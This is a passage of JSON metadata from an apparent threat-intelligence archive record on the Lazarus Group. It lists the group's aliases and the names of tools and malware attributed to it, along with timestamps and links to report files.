"SectorA01", "Slow Pisces", "TA404", "TraderTraitor", "UNC2970", "UNC4034", "UNC4736", "UNC4899", "UNC577", "Whois Hacking Team" ], "source_name": "ETDA:Lazarus Group", "tools": [ "3CX Backdoor", "3Rat Client", "3proxy", "AIRDRY", "ARTFULPIE", "ATMDtrack", "AlphaNC", "Alreay", "Andaratm", "AngryRebel", "AppleJeus", "Aryan", "AuditCred", "BADCALL", "BISTROMATH", "BLINDINGCAN", "BTC Changer", "BUFFETLINE", "BanSwift", "Bankshot", "Bitrep", "Bitsran", "BlindToad", "Bookcode", "BootWreck", "BottomLoader", "Brambul", "BravoNC", "Breut", "COLDCAT", "COPPERHEDGE", "CROWDEDFLOUNDER", "Castov", "CheeseTray", "CleanToad", "ClientTraficForwarder", "CollectionRAT", "Concealment Troy", "Contopee", "CookieTime", "Cyruslish", "DAVESHELL", "DBLL Dropper", "DLRAT", "DRATzarus", "DRATzarus RAT", "Dacls", "Dacls RAT", "DarkComet", "DarkKomet", "DeltaCharlie", "DeltaNC", "Dembr", "Destover", "DoublePulsar", "Dozer", "Dtrack", "Duuzer", "DyePack", "ECCENTRICBANDWAGON", "ELECTRICFISH", "Escad", "EternalBlue", "FALLCHILL", "FYNLOS", "FallChill RAT", "Farfli", "Fimlis", "FoggyBrass", "FudModule", "Fynloski", "Gh0st RAT", "Ghost RAT", "Gopuram", "HARDRAIN", "HIDDEN COBRA RAT/Worm", "HLOADER", "HOOKSHOT", "HOPLIGHT", "HOTCROISSANT", "HOTWAX", "HTTP Troy", "Hawup", "Hawup RAT", "Hermes", "HotCroissant", "HotelAlfa", "Hotwax", "HtDnDownLoader", "Http Dr0pper", "ICONICSTEALER", "Joanap", "Jokra", "KANDYKORN", "KEYMARBLE", "Kaos", "KillDisk", "KillMBR", "Koredos", "Krademok", "LIGHTSHIFT", "LIGHTSHOW", "LOLBAS", "LOLBins", "Lazarus", "LightlessCan", "Living off the Land", "MATA", "MBRkiller", "MagicRAT", "Manuscrypt", "Mimail", "Mimikatz", "Moudour", "Mydoom", "Mydoor", "Mytob", "NACHOCHEESE", "NachoCheese", "NestEgg", "NickelLoader", "NineRAT", "Novarg", "NukeSped", "OpBlockBuster", "PCRat", "PEBBLEDASH", "PLANKWALK", "POOLRAT", "PSLogger", "PhanDoor", "Plink", "PondRAT", "PowerBrace", "PowerRatankba", "PowerShell RAT", "PowerSpritz", "PowerTask", "Preft", "ProcDump", "Proxysvc", "PuTTY Link", "QUICKRIDE", "QUICKRIDE.POWER", "Quickcafe", "QuiteRAT", "R-C1", "ROptimizer", "Ratabanka", "RatabankaPOS", "Ratankba", "RatankbaPOS", "RawDisk", "RedShawl", "Rifdoor", "Rising Sun", "Romeo-CoreOne", "RomeoAlfa", "RomeoBravo", "RomeoCharlie", "RomeoCore", "RomeoDelta", "RomeoEcho", "RomeoFoxtrot", "RomeoGolf", "RomeoHotel", "RomeoMike", "RomeoNovember", "RomeoWhiskey", "Romeos", "RustBucket", "SHADYCAT", "SHARPKNOT", "SIGFLIP", "SIMPLESEA", "SLICKSHOES", "SORRYBRUTE", "SUDDENICON", "SUGARLOADER", "SheepRAT", "SierraAlfa", "SierraBravo", "SierraCharlie", "SierraJuliett-MikeOne", "SierraJuliett-MikeTwo", "SimpleTea", "SimplexTea", "SmallTiger", "Stunnel", "TAINTEDSCRIBE", "TAXHAUL", "TFlower", "TOUCHKEY", "TOUCHMOVE", "TOUCHSHIFT", "TOUCHSHOT", "TWOPENCE", "TYPEFRAME", "Tdrop", "Tdrop2", "ThreatNeedle", "Tiger RAT", "TigerRAT", "Trojan Manuscript", "Troy", "TroyRAT", "VEILEDSIGNAL", "VHD", "VHD Ransomware", "VIVACIOUSGIFT", "VSingle", "ValeforBeta", "Volgmer", "Vyveva", "W1_RAT", "Wana Decrypt0r", "WanaCry", "WanaCrypt", "WanaCrypt0r", "WannaCry", "WannaCrypt", "WannaCryptor", "WbBot", "Wcry", "Win32/KillDisk.NBB", "Win32/KillDisk.NBC", "Win32/KillDisk.NBD", "Win32/KillDisk.NBH", "Win32/KillDisk.NBI", "WinorDLL64", "Winsec", "WolfRAT", "Wormhole", "YamaBot", "Yort", "ZetaNile", "concealment_troy", "http_troy", "httpdr0pper", "httpdropper", "klovbot", "sRDI" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434287, "ts_updated_at": 1775792299, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/392c0d65d86c9e8426d91d0d082485dcbb8c082a.pdf", "text": "https://archive.orkl.eu/392c0d65d86c9e8426d91d0d082485dcbb8c082a.txt", "img": "https://archive.orkl.eu/392c0d65d86c9e8426d91d0d082485dcbb8c082a.jpg" } }